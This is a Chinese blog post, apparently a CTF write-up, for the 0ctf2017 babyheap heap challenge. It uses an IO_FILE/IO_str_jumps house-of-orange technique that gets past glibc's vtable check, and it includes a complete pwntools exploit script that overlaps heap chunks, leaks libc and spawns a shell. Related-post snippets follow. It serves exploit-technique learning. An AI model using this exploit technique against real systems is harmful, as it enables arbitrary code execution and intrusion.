【pwn】0ctf2017_babyheap IO_FILE解法

最新推荐文章于 2022-07-25 14:37:06 发布
最新推荐文章于 2022-07-25 14:37:06 发布
阅读量180 收藏
点赞数
分类专栏: pwn刷题笔记 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/118528918
版权

libc2.24以后加入了对 vtable 的检查,这里采用 IO_str_jumps,fake_files 如下:
第一种利用io_finish:

fake_file += p64(0) + p64(0x61)
fake_file += p64(0) + p64(io_list_all - 0x10)
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(bin_sh)
fake_file = fake_file.ljust(0xd8 + 0x20, "\x00")
fake_file += p64(io_str_jumps - 8) + p64(0) + p64(system)

其中 0x61 和 io_list_all 是 ub attack + house of orange
vtable 放入/bin/sh的地址
放入 io_str_jumps - 8 
vtable+0x10 放入 system

第二种使用 IO_str_overflow:
其中_IO_str_overflow函数会调用文件对象fd+0xe0处的地址。
在house of orange的基础上进行更新,将虚表地址设置为IO_str_jumps地址,fd+0xe0设置为one_gadget即可完成利用。

file_struct=p64(0)+p64(0x61)+p64(libc)+p64(io_list_all_addr - 0x10)+p64(2)+p64(3)
file_struct = file_struct.ljust(0xd8, "\x00")
file_struct += p64(jump_table_addr)
file_struct += p64(og)

完整exp:

from pwn import *
import sys

binary = "./pwn"
context.log_level = "debug"
context.binary = binary
context.arch = "amd64"
elf = ELF(binary)

local = 1

if local:
    p = process(binary)
    libc = elf.libc
    # p = process(binary, env={'LD_PRELOAD':'./libc-2.31.so'})
    # libc = ELF("./libc-2.31.so")
    # libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
else:   
    host = "node3.buuoj.cn"
    port = 28488
    p = remote(host, port)
    libc = ELF("/home/mtb0tx/share/ctf-pwn/libc/libc-2.29-buu.so")

DEBUG = 0
if DEBUG:
    gdb.attach(p, 
    ''' 
    b *0x08048935
    c
    ''')

def dbg():
    gdb.attach(p)
    pause()

se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num              	:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
l64     = lambda              		:u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32     = lambda              		:u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
r64     = lambda					:u64(p.recv(6).ljust(8, "\x00"))
li      = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia      = lambda                    :p.interactive()

menu = "Command: "

def cmd(ch):
  	p.recvuntil(menu)
	p.sendline(str(ch))

def add(size):
    cmd(1)
    ru("Size: ")
    sl(str(size))

def edit(idx, con):
    cmd(2)
    ru("Index: ")
    sl(str(idx))
    ru("Size: ")
    sl(str(len(con)))
    ru("Content: ")
    se(con)

def dele(idx):
    cmd(3)
    ru("Index: ")
    sl(str(idx))

def show(idx):
    cmd(4)
    ru("Index: ")
    sl(str(idx))

add(0x18) #0
add(0x20) #1
add(0x100) #2
add(0x20) #3

pl = "\x00"*0x18 + p64(0x141)
edit(0, pl)

dele(1)
add(0x130) #1
# recover
pl = "\x00"*0x28 + p64(0x111)
edit(1, pl)

# overlap
dele(2)
show(1)
libc.address = l64() - libc.sym['__malloc_hook'] - 0x68
li("libc_base", libc.address)

'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''

io_str_jumps = libc.address + 0x3c37a0
io_list_all  = libc.sym['_IO_list_all'] #0x3c5520
system = libc.sym['system']
bin_sh = libc.search("/bin/sh\x00").next()

fake_file = p64(0) * 4
fake_file += p64(0) + p64(0x61)
fake_file += p64(0) + p64(io_list_all - 0x10)
fake_file += p64(0) + p64(1)
fake_file += p64(0) + p64(bin_sh)
fake_file = fake_file.ljust(0xd8 + 0x20, "\x00")
fake_file += p64(io_str_jumps - 8) + p64(0) + p64(system)

edit(1, fake_file)

add(0x10)
# dbg()
ia()
、皮皮鸭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
babyheap_0_ctf_2017
m0_48127441的博客
04-01 197
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
浅析IOFILE结构及利用
Peanuts
11-21 3295
浅析IOFILE结构及利用 本文首发于先知社区 在hctf中遇到了这么一个题,也借这个题专门去补了补自己在IOFILE这一块知识点的知识。 libio.h中的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _...
Linux pwn入门教程,pwn堆入门系列教程1
weixin_29015899的博客
05-02 505
pwn堆入门系列教程1因为自己学堆的时候,找不到一个系统的教程,我将会按照ctf-wiki的目录一步步学下去,尽量做到每周有更新,方便跟我一样刚入门堆的人学习,第一篇教程研究了4天吧,途中没人指导。。很尴尬,自己一个很容易的点研究了很久才懂,把踩过的坑也总结下,方便后人不再踩坑学习链接环境搭建off by one原理(引用ctf-wiki)off-by-one 是指单字节缓冲区溢出,这种漏洞的产生...
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5109
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
DASCTF 7月赋能赛pwn wp
N1rvana的博客
07-25 497
DASCTF 7月赋能赛pwn wp
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctfpwn题char的libc库文件
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
0ctf_2016_warmup
05-17
2016年0ctfpwn题。
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
0ctf-2017-pwn-char
02-05
2017年0ctfpwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
hctf[pwn] the-end
九层台
11-12 1982
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { signed int i; // [rsp+4h] [rbp-Ch] void *buf; // [rsp+8h] [rbp-8h] sleep(0); printf("here is a gift %p, good luck ;)\n", &a...
2021强网拟态复现
qq_46441427的博客
10-30 518
sonic checksec一下 发现开了PIE和NX还有relro,这里比赛的时候本来想打ret2csu的。。好像是这个名字。。忘了 程序打印出了main的地址,开PIE后三位不变,所以打印出main地址后直接取除了后三位的其他位,在ida找后三位地址加上就行,然后就可以栈溢出getshell from pwn import * #r=remote('123.60.63.90',6890) r = process('./sonic') context(arch='amd64', os='linux')
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2007
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
GYctf-BFnote IO_FILE还可以这样利用
蚁景网安学院
02-27 216
这次感受到了自己是多么的菜,打完hgame再来打这个感觉完全不是一个等级的pwn题,第一天只做出来一个,算是比较有质量的题吧,从比赛开始卡到我比赛结束,幸亏最后做出来了。有两个很明显的溢...
pwn】orw
weixin_43960998的博客
06-19 1750
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1299
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 666
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 537
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcache 的 double free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
【笔记】pwn模板
weixin_43960998的博客
02-21 504
今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下: from pwn import * import sys context.log_level = "debug" elf = ELF("./pwn") if sys.argv[1] == "process": p = process("./pwn") libc = ELF("/lib/x86_64-linux-gnu/li
pwn 口算 ctf
最新发布
10-15
pwn 口算 ctf 是一种 CTF 竞赛中的题目类型,主要考察选手对于二进制漏洞利用和计算机底层知识的掌握程度。这类题目通常会提供一个二进制文件,选手需要通过分析程序的漏洞,编写相应的 exploit 脚本,从而获取程序...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值